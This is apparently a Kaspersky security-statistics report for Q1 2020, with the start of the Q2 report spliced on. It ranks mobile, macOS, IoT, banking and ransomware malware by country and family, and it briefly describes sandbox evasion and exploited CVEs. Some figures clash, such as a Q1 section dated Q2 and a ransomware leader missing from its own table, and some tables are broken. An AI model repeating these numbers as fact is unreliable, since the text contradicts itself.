_Number of installation packages of mobile banking trojans detected by Kaspersky, Q1 2019 – Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194342/sl_malware_report_04-kolichestvo-ustanovochnyh-paketov-mobilnyh-bankovskih-troyancev-q1-2019-q1-2019.png>)_

**Top 10 mobile banking trojans**

|    | **Verdict** | **%*** |
|---|---|---|
| 1 | Trojan-Banker.AndroidOS.Rotexy.e | 13.11 |
| 2 | Trojan-Banker.AndroidOS.Svpeng.q | 10.25 |
| 3 | Trojan-Banker.AndroidOS.Asacub.snt | 7.64 |
| 4 | Trojan-Banker.AndroidOS.Asacub.ce | 6.31 |
| 5 | Trojan-Banker.AndroidOS.Agent.eq | 5.70 |
| 6 | Trojan-Banker.AndroidOS.Anubis.san | 4.68 |
| 7 | Trojan-Banker.AndroidOS.Agent.ep | 3.65 |
| 8 | Trojan-Banker.AndroidOS.Asacub.a | 3.50 |
| 9 | Trojan-Banker.AndroidOS.Asacub.ar | 3.00 |
| 10 | Trojan-Banker.AndroidOS.Agent.cf | 2.70 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by banking threats._

First and second places in our top 10 were claimed by trojans targeted at Russian-speaking mobile users: Trojan-Banker.AndroidOS.Rotexy.e (13.11%) and Trojan-Banker.AndroidOS.Svpeng.q (10.25%).

Third, fourth, eighth, and ninth positions in the top 10 mobile banking threats went to members of the Asacub family.
The cybercriminals behind this trojan stopped creating new samples, but its distribution channels were still active in Q1.

_Geography of mobile banking threats, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194517/sl_malware_report_05-en-mobile-banker-map.png>)_

**Top 10 countries by share of users attacked by mobile banking trojans**

|    | **Country*** | **%**** |
|---|---|---|
| 1 | Japan | 0.57 |
| 2 | Spain | 0.48 |
| 3 | Italy | 0.26 |
| 4 | Bolivia | 0.18 |
| 5 | Russia | 0.17 |
| 6 | Turkey | 0.13 |
| 7 | Tajikistan | 0.13 |
| 8 | Brazil | 0.11 |
| 9 | Cuba | 0.11 |
| 10 | China | 0.10 |

_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._
_** Unique users attacked by mobile banking trojans as a percentage of all users of Kaspersky mobile products in the country._

In Q1 2020, Japan (0.57%) had the largest share of users attacked by mobile bankers; the vast majority of cases involved Trojan-Banker.AndroidOS.Agent.eq.

In second place came Spain (0.48%), where in more than half of all cases we detected malware from the Trojan-Banker.AndroidOS.Cebruser family, and another quarter of detections were members of the Trojan-Banker.AndroidOS.Ginp family.

Third place belonged to Italy (0.26%), where, as in Spain, the Trojan-Banker.AndroidOS.Cebruser family was the most widespread, with almost two-thirds of detections.

It is worth saying a bit more about the Cebruser family. Its creators were among the first to exploit the coronavirus topic to spread the malware.

When it runs, the trojan immediately gets down to business: it requests access to Accessibility Services to obtain Device Admin permissions, and then tries to get hold of card details.

The malware is distributed under the [Malware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) model; its set of functions is standard for such threats, but with one interesting detail: the use of a step-counter for activation so as to bypass dynamic analysis tools ([sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)). Cebruser targets the mobile apps of banks in various countries and popular non-financial apps; its main weapons are phishing windows and interception of two-factor authorization. In addition, the malware can block the screen using a ransomware tool and intercept keystrokes on the virtual keyboard.

### Mobile ransomware trojans

In Q2 2020, we detected **4,339** installation packages of mobile trojan ransomware, 1,067 fewer than in the previous quarter.

_Number of installation packages of mobile ransomware trojans detected by Kaspersky, Q1 2019 – Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194615/sl_malware_report_06-kolichestvo-ustanovochnyh-paketov-mobilnyh-troyancev-vymogatelej-q1-2018-q1-2019.png>)_

**Top 10 mobile ransomware trojans**

|    | **Verdict** | **%*** |
|---|---|---|
| 1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 17.08 |
| 2 | Trojan-Ransom.AndroidOS.Congur.e | 12.70 |
| 3 | Trojan-Ransom.AndroidOS.Small.as | 11.41 |
| 4 | Trojan-Ransom.AndroidOS.Rkor.k | 9.88 |
| 5 | Trojan-Ransom.AndroidOS.Small.as | 7.32 |
| 6 | Trojan-Ransom.AndroidOS.Small.o | 4.79 |
| 7 | Trojan-Ransom.AndroidOS.Svpeng.aj | 3.62 |
| 8 | Trojan-Ransom.AndroidOS.Svpeng.ah | 3.55 |
| 9 | Trojan-Ransom.AndroidOS.Congur.e | 3.32 |
| 10 | Trojan-Ransom.AndroidOS.Fusob.h | 3.17 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by ransomware trojans._

Over the past few quarters, the number of ransomware trojans detected has been gradually decreasing; all the same, we continue to detect quite a few infection attempts by this class of threats.
The main contributors to the statistics were the Svpeng, Congur, and Small ransomware families.

_Geography of mobile ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194659/sl_malware_report_07-en-mobile-ransom-map.png>)_

**Top 10 countries by share of users attacked by mobile ransomware trojans**

|    | **Country*** | **%**** |
|---|---|---|
| 1 | USA | 0.26 |
| 2 | Kazakhstan | 0.25 |
| 3 | Iran | 0.16 |
| 4 | China | 0.09 |
| 5 | Saudi Arabia | 0.08 |
| 6 | Italy | 0.03 |
| 7 | Mexico | 0.03 |
| 8 | Canada | 0.03 |
| 9 | Indonesia | 0.03 |
| 10 | Switzerland | 0.03 |

_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._
_** Unique users attacked by mobile ransomware trojans as a percentage of all users of Kaspersky mobile products in the country._

The leaders by number of users attacked by mobile ransomware trojans are Syria (0.28%), the United States (0.26%) and Kazakhstan (0.25%).

## Attacks on Apple macOS

In Q1 2020, we detected not only new versions of common threats, but also one new backdoor family, whose first member was Backdoor.OSX.Capip.a. The malware's operating principle is simple: it calls the C&C for a shell script, which it then downloads and executes.

### Top 20 threats to macOS

|    | **Verdict** | **%*** |
|---|---|---|
| 1 | Trojan-Downloader.OSX.Shlayer.a | 19.27 |
| 2 | AdWare.OSX.Pirrit.j | 10.34 |
| 3 | AdWare.OSX.Cimpli.k | 6.69 |
| 4 | AdWare.OSX.Ketin.h | 6.27 |
| 5 | AdWare.OSX.Pirrit.aa | 5.75 |
| 6 | AdWare.OSX.Pirrit.o | 5.74 |
| 7 | AdWare.OSX.Pirrit.x | 5.18 |
| 8 | AdWare.OSX.Spc.a | 4.56 |
| 9 | AdWare.OSX.Cimpli.f | 4.25 |
| 10 | AdWare.OSX.Bnodlero.t | 4.08 |
| 11 | AdWare.OSX.Bnodlero.x | 3.74 |
| 12 | Hoax.OSX.SuperClean.gen | 3.71 |
| 13 | AdWare.OSX.Cimpli.h | 3.37 |
| 14 | AdWare.OSX.Pirrit.v | 3.30 |
| 15 | AdWare.OSX.Amc.c | 2.98 |
| 16 | AdWare.OSX.MacSearch.d | 2.85 |
| 17 | RiskTool.OSX.Spigot.a | 2.84 |
| 18 | AdWare.OSX.Pirrit.s | 2.80 |
| 19 | AdWare.OSX.Ketin.d | 2.76 |
| 20 | AdWare.OSX.Bnodlero.aq | 2.70 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._

The top 20 threats for macOS did not undergo any major changes in Q1 2020. The adware trojan Shlayer.a (19.27%) still tops the leaderboard, followed by objects that Shlayer itself loads into the infected system, in particular numerous adware apps from the Pirrit family.

Interestingly, the unwanted program Hoax.OSX.SuperClean.gen landed in 12th place on the list. Like other Hoax-type programs, it is distributed under the guise of a system cleanup app, and immediately after installation scares the user with problems purportedly found in the system, such as gigabytes of trash on the hard drive.

### Threat geography

|    | **Country*** | **%**** |
|---|---|---|
| 1 | Spain | 7.14 |
| 2 | France | 6.94 |
| 3 | Italy | 5.94 |
| 4 | Canada | 5.58 |
| 5 | USA | 5.49 |
| 6 | Russia | 5.10 |
| 7 | India | 4.88 |
| 8 | Mexico | 4.78 |
| 9 | Brazil | 4.65 |
| 10 | Belgium | 4.65 |

_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)._
_** Unique users who encountered macOS threats as a percentage of all users of Kaspersky security solutions for macOS in the country._

The leading countries, as in previous quarters, were Spain (7.14%), France (6.94%) and Italy (5.94%). The main contributors to the number of detections in these countries were the familiar Shlayer trojan and adware apps from the Pirrit family.

## IoT attacks

### IoT threat statistics

In Q1 2020, the share of IP addresses from which attempts were made to attack Kaspersky telnet traps increased significantly. Their share amounted to 81.1% of all IP addresses from which attacks were carried out, while SSH traps accounted for slightly less than 19%.

| Service | Share |
|---|---|
| SSH | 18.9% |
| Telnet | 81.1% |

_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2020_

It was a similar situation with control sessions: attackers often controlled infected traps via telnet.
\n \nSSH | 39.62% \nTelnet | 60.38% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2020_\n\n### Telnet-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky telnet traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194811/sl_malware_report_09-en-telnet-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky telnet traps.**\n\nCountry* | **%** \n---|--- \nChina | 13.04 \nEgypt | 11.65 \nBrazil | 11.33 \nVietnam | 7.38 \nTaiwan | 6.18 \nRussia | 4.38 \nIran | 3.96 \nIndia | 3.14 \nTurkey | 3.00 \nUSA | 2.57 \n \n_ _ \nFor several quarters in a row, the leading country by number of attacking bots has been China: in Q1 2020 its share stood at 13.04%. As before, it is followed by Egypt (11.65%) and Brazil (11.33%).\n\n### SSH-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky SSH traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194853/sl_malware_report_10-en-ssh-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps.**\n\nCountry* | % \n---|--- \nChina | 14.87 \nVietnam | 11.58 \nUSA | 7.03 \nEgypt | 6.82 \nBrazil | 5.79 \nRussia | 4.66 \nIndia | 4.16 \nGermany | 3.64 \nThailand | 3.44 \nFrance | 2.83 \n \nIn Q1 2020, China (14.87%), Vietnam (11.58%) and the US (7.03%) made up the top three countries by number of unique IPs from which attacks on SSH traps originated.\n\n### Threats loaded into honeypots\n\n**Verdict** | %* \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 64.35 \nBackdoor.Linux.Mirai.b | 16.75 \nBackdoor.Linux.Mirai.ba | 6.47 \nBackdoor.Linux.Gafgyt.a | 4.36 \nBackdoor.Linux.Gafgyt.bj | 1.30 \nTrojan-Downloader.Shell.Agent.p | 0.68 \nBackdoor.Linux.Mirai.c | 0.64 \nBackdoor.Linux.Hajime.b | 0.46 \nBackdoor.Linux.Mirai.h | 0.40 
| Backdoor.Linux.Gafgyt.av | 0.35 |

_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful attack._

In Q1 2020, attackers most often downloaded the minimalistic trojan loader NyaDrop (64.35%), whose executable file does not exceed 500 KB. Threats from the Mirai family traditionally dominated: its members claimed four places in our top 10. These malicious programs will continue to rule the world of IoT threats for a long time to come, at least until the appearance of a more advanced (and publicly available) DDoS bot.

## Financial threats

### Financial threat statistics

In Q1 2020, Kaspersky solutions blocked attempts to launch one or several types of malware designed to steal money from bank accounts on the computers of 249,748 users.

_Number of unique users attacked by financial malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194937/sl_malware_report_11-en-finance.png>)_

**Attack geography**

To assess and compare the risk of being infected by banking trojans and ATM/POS malware in various countries, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

_Geography of banking malware attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195018/sl_malware_report_12-en-finance-map.png>)_

**Top 10 countries by share of attacked users**

| | Country* | %** |
|---|---|---|
| 1 | Uzbekistan | 10.5 |
| 2 | Tajikistan | 6.9 |
| 3 | Turkmenistan | 5.5 |
| 4 | Afghanistan | 5.1 |
| 5 | Yemen | 3.1 |
| 6 | Kazakhstan | 3.0 |
| 7 | Guatemala | 2.8 |
| 8 | Syria | 2.4 |
| 9 | Sudan | 2.1 |
| 10 | Kyrgyzstan | 2.1 |

_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._

_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._

**Top 10 banking malware families**

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Emotet | Backdoor.Win32.Emotet | 21.3 |
| 2 | Zbot | Trojan.Win32.Zbot | 20.8 |
| 3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 17.2 |
| 4 | RTM | Trojan-Banker.Win32.RTM | 12.3 |
| 5 | Nimnul | Virus.Win32.Nimnul | 3.6 |
| 6 | Trickster | Trojan.Win32.Trickster | 3.6 |
| 7 | Neurevt | Trojan.Win32.Neurevt | 3.3 |
| 8 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 |
| 9 | Danabot | Trojan-Banker.Win32.Danabot | 2.0 |
| 10 | Nymaim | Trojan.Win32.Nymaim | 1.9 |

_* Unique users attacked by this malware family as a percentage of all users attacked by financial malware._

## Ransomware programs

### Quarterly highlights

Ransomware attacks on organizations, as well as on city and municipal networks, did not ease off. Given how lucrative they are for cybercriminals, there is no reason why this trend of several years should cease.

More and more ransomware is starting to supplement encryption with data theft. To date, this tactic has been adopted by distributors of ransomware families including Maze, REvil/Sodinokibi, DoppelPaymer and JSWorm/Nemty/Nefilim. If the victim refuses to pay the ransom for decryption (because, say, the data was recovered from a backup copy), the attackers threaten to put the stolen confidential information in the public domain.
Such threats are sometimes empty, but not always: the authors of several ransomware programs have set up websites that do indeed publish the data of victim organizations.

### Number of new modifications

In Q1 2020, we detected five new ransomware families and 5,225 new modifications of these malware programs.

_Number of new ransomware modifications detected, Q1 2019 – Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195150/sl_malware_report_13-ransomware-novye-modifikacii.png>)_

### Number of users attacked by ransomware trojans

In Q1 2020, Kaspersky products and technologies protected 178,922 users from ransomware attacks.

_Number of unique users attacked by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195235/sl_malware_report_14-en-ransomware-atakovannye-polzovateli.png>)_

### Attack geography

_Geography of attacks by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201512/sl_malware_report_15-en-ransomware-map.png>)_

**Top 10 countries attacked by ransomware trojans**

| | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 6.64 |
| 2 | Uzbekistan | 1.98 |
| 3 | Mozambique | 1.77 |
| 4 | Ethiopia | 1.67 |
| 5 | Nepal | 1.34 |
| 6 | Afghanistan | 1.31 |
| 7 | Egypt | 1.21 |
| 8 | Ghana | 0.83 |
| 9 | Azerbaijan | 0.81 |
| 10 | Serbia | 0.74 |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._

_** Unique users whose computers were attacked by ransomware trojans as a percentage of all unique users of Kaspersky products in the country._

### Top 10 most common families of ransomware trojans

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.03 |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 16.71 |
| 3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 16.22 |
| 4 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 7.73 |
| 5 | Stop | Trojan-Ransom.Win32.Stop | 6.62 |
| 6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.28 |
| 7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.15 |
| 8 | PolyRansom/VirLock | Virus.Win32.PolyRansom, Trojan-Ransom.Win32.PolyRansom | 2.96 |
| 9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.02 |
| 10 | (generic verdict) | Trojan-Ransom.Win32.Generic | 1.56 |

_* Unique Kaspersky users attacked by the specified family of ransomware trojans as a percentage of all users attacked by ransomware trojans._

## Miners

### Number of new modifications

In Q1 2020, Kaspersky solutions detected 192,036 new miner modifications.

_Number of new miner modifications, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201558/sl_malware_report_16-en-miner-kolichestvo-novyh-modifikacij.png>)_

### Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 518,857 unique users of Kaspersky Lab products worldwide.

_Number of unique users attacked by miners, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201637/sl_malware_report_17-en-miner-kolichestvo-polzovatelej-atakovannyh-majnerami.png>)_

### Attack geography

_Geography of miner attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201719/sl_malware_report_18-en-miner-map.png>)_

**Top 10 countries attacked by miners**

| | Country* | %** |
|---|---|---|
| 1 | Afghanistan | 6.72 |
| 2 | Ethiopia | 4.90 |
| 3 | Tanzania | 3.26 |
| 4 | Sri Lanka | 3.22 |
| 5 | Uzbekistan | 3.10 |
| 6 | Rwanda | 2.56 |
| 7 | Vietnam | 2.54 |
| 8 | Kazakhstan | 2.45 |
| 9 | Mozambique | 1.96 |
| 10 | Pakistan | 1.67 |

_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._

_** Unique users whose computers were
attacked by miners as a percentage of all unique users of Kaspersky products in the country._

## Vulnerable applications used by cybercriminals during cyberattacks

We already noted that Microsoft Office vulnerabilities are the most common ones. Q1 2020 was no exception: the share of exploits for these vulnerabilities grew to 74.83%. The most popular vulnerability in Microsoft Office was [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which is related to a stack overflow error in the Equation Editor component. Hard on its heels was [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which is used to embed a malicious script in an OLE object inside an Office document. Several other vulnerabilities, such as [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), were also popular with attackers. In the absence of security updates for Microsoft Office, these vulnerabilities are successfully exploited and the user's system becomes infected.

In second place were exploits for vulnerabilities in Internet browsers (11.06%). In Q1, cybercriminals attacked a whole host of browsers, including Microsoft Internet Explorer, Google Chrome and Mozilla Firefox. What's more, some of the vulnerabilities were used in APT attacks, such as [CVE-2020-0674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>), which is associated with the incorrect handling of objects in memory in an outdated version of the JScript scripting engine in Internet Explorer, leading to code execution. Another example is the previously identified [CVE-2019-17026](<https://nvd.nist.gov/vuln/detail/CVE-2019-17026>), a data type mismatch vulnerability in Mozilla Firefox's JIT compiler, which also leads to remote code execution. In the event of a successful attack, both browser exploits cause a malware infection. The researchers also detected a targeted attack against Google Chrome exploiting the RCE vulnerability [CVE-2020-6418](<https://nvd.nist.gov/vuln/detail/CVE-2020-6418>) in the JavaScript engine; in addition, the dangerous RCE vulnerability [CVE-2020-0767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0767>) was detected in a component of the ChakraCore scripting engine used by Microsoft Edge. Although modern browsers have their own protection mechanisms, cybercriminals are forever finding ways around them, very often using chains of exploits to do so. Therefore, it is vital to keep the operating system and software up to date at all times.

_Distribution of exploits used in attacks by type of application attacked, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201812/sl_malware_report_19-vuln.png>)_

This quarter, a wide range of critical vulnerabilities were detected in operating systems and their components.

 * [CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a vulnerability caused by an error in the core cryptographic library of Windows, in the certificate validation algorithm for certificates that use elliptic curves. This vulnerability enables the use of fake certificates that the system recognizes as legitimate.
 * [CVE-2020-0729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729>) is a vulnerability in the processing of LNK files in Windows, which allows remote code execution if the user opens a malicious shortcut.
 * [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) is the result of a default configuration error in Microsoft Exchange Server, whereby the same cryptographic keys are used to sign and encrypt serialized ASP.NET ViewState data, enabling attackers to execute their own code on the server side with system rights.

Various network attacks on system services and network protocols were as popular as ever with attackers. We continue to detect attempts at exploiting vulnerabilities in the SMB protocol using EternalBlue, EternalRomance and similar sets of exploits. In Q1 2020, the new vulnerability [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SMBGhost) was detected in the SMBv3 network protocol, leading to remote code execution; the attacker does not even need to know the username/password combination, since the error occurs before the authentication stage. However, it is present only in Windows 10. Two critical vulnerabilities ([CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>)) were found in Remote Desktop Gateway, enabling an unauthorized user to execute remote code in the target system.
In addition, there were more frequent attempts to brute-force passwords to Remote Desktop Services and Microsoft SQL Server via the SMB protocol.

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks: Top 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q1 2020, Kaspersky solutions defeated 726,536,269 attacks launched from online resources located in 203 countries worldwide. As many as 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.

_Distribution of web-based attack sources by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202037/sl_malware_report_20-en-web-source.png>)_

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Bulgaria | 13.89 |
| 2 | Tunisia | 13.63 |
| 3 | Algeria | 13.15 |
| 4 | Libya | 12.05 |
| 5 | Bangladesh | 9.79 |
| 6 | Greece | 9.66 |
| 7 | Latvia | 9.64 |
| 8 | Somalia | 9.20 |
| 9 | Philippines | 9.11 |
| 10 | Morocco | 9.10 |
| 11 | Albania | 9.09 |
| 12 | Taiwan, Province of China | 9.04 |
| 13 | Mongolia | 9.02 |
| 14 | Nepal | 8.69 |
| 15 | Indonesia | 8.62 |
| 16 | Egypt | 8.61 |
| 17 | Georgia | 8.47 |
| 18 | France | 8.44 |
| 19 | Palestine | 8.34 |
| 20 | Qatar | 8.30 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._

_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._

_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to providing statistical data._

On average, 6.56% of Internet users' computers worldwide experienced at least one **Malware-class** attack.

_Geography of malicious web-based attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202126/sl_malware_report_21-en-web-map.png>)_

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or on removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

In Q1 2020, our File Anti-Virus registered **164,653,290** malicious and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal-computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Afghanistan | 52.20 |
| 2 | Tajikistan | 47.14 |
| 3 | Uzbekistan | 45.16 |
| 4 | Ethiopia | 45.06 |
| 5 | Myanmar | 43.14 |
| 6 | Bangladesh | 42.14 |
| 7 | Kyrgyzstan | 41.52 |
| 8 | Yemen | 40.88 |
| 9 | China | 40.67 |
| 10 | Benin | 40.21 |
| 11 | Mongolia | 39.58 |
| 12 | Algeria | 39.55 |
| 13 | Laos | 39.21 |
| 14 | Burkina Faso | 39.09 |
| 15 | Malawi | 38.42 |
| 16 | Sudan | 38.34 |
| 17 | Rwanda | 37.84 |
| 18 | Iraq | 37.82 |
| 19 | Vietnam | 37.42 |
| 20 | Mauritania | 37.26 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._

_** Unique users on whose computers **Malware-class** local threats were blocked as a percentage of all unique users of Kaspersky products in the country._

_Geography of local infection attempts, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202208/sl_malware_report_22-en-local-map.png>)_

Overall, 19.16% of user computers globally
faced at least one **Malware**-class local threat during Q1.

_Source: "IT threat evolution Q1 2020. Statistics", Securelist (Kaspersky), published 2020-05-20, <https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/>._

**[IT threat evolution Q2 2020. Review](<https://securelist.com/it-threat-evolution-q2-2020/98230/>)**

**[IT threat evolution Q2 2020. Mobile statistics](<https://securelist.com/it-threat-evolution-q2-2020-mobile-statistics/98337/>)**

_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._

## Quarterly figures

According to Kaspersky Security Network, in Q2:

 * Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.
 * As many as 286,229,445 unique URLs triggered Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 181,725 unique users.
 * Ransomware attacks were defeated on the computers of 154,720 unique users.
 * Our File Anti-Virus detected 80,993,511 unique malware and potentially unwanted objects.

## Financial threats

### Financial threat statistics

In Q2 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 181,725 users.

_Number of unique users attacked by
financial malware, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105102/16-en-malware_q2-2020_stats_non-mobile.png>))_

**Geography of attacks**

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

_Geography of financial malware attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105134/17-en-malware_q2-2020_stats_non-mobile.png>))_

**Top 10 countries by share of attacked users**

| | Country* | %** |
|---|---|---|
| 1 | Turkmenistan | 7.5 |
| 2 | Uzbekistan | 5.7 |
| 3 | Tajikistan | 5.6 |
| 4 | Afghanistan | 2.6 |
| 5 | Macedonia | 2.6 |
| 6 | Yemen | 2.2 |
| 7 | Syria | 1.9 |
| 8 | Kazakhstan | 1.7 |
| 9 | Cyprus | 1.7 |
| 10 | Iran | 1.5 |

_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._

_** Unique users of Kaspersky products whose computers were targeted by financial malware as a share of all unique users of Kaspersky products in the country._

Among the banking Trojan families, the share of Backdoor.Win32.Emotet decreased markedly from 21.3% to 6.6%. This botnet's activity decreased at the end of Q1 2020, but the results only became clear in the second quarter. However, as we prepared this report, we noticed that Emotet was gradually recovering.

**Top 10 banking malware families**

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Zbot | Trojan.Win32.Zbot | 24.8 |
| 2 | RTM | Trojan-Banker.Win32.RTM | 18.6 |
| 3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.4 |
| 4 | Emotet | Backdoor.Win32.Emotet | 6.6 |
| 5 | Trickster | Trojan.Win32.Trickster | 4.7 |
| 6 | Nimnul | Virus.Win32.Nimnul | 4.3 |
| 7 | Danabot | Trojan-Banker.Win32.Danabot | 3.4 |
| 8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.0 |
| 9 | Nymaim | Trojan.Win32.Nymaim | 2.5 |
| 10 | Neurevt | Trojan.Win32.Neurevt | 1.4 |

_* Unique users attacked by this malware family as a percentage of all users attacked by financial malware._

## Ransomware programs

### Quarterly trend highlights

The attackers behind the Shade ransomware announced that they had ceased to distribute the Trojan. In addition, they published keys to decrypt files affected by all of its versions. The number of keys accumulated over the years exceeded 750,000, and we [updated](<https://www.kaspersky.com/blog/shade-decryptor-2020/35246/>) our ShadeDecryptor utility to help Shade victims regain access to their data.

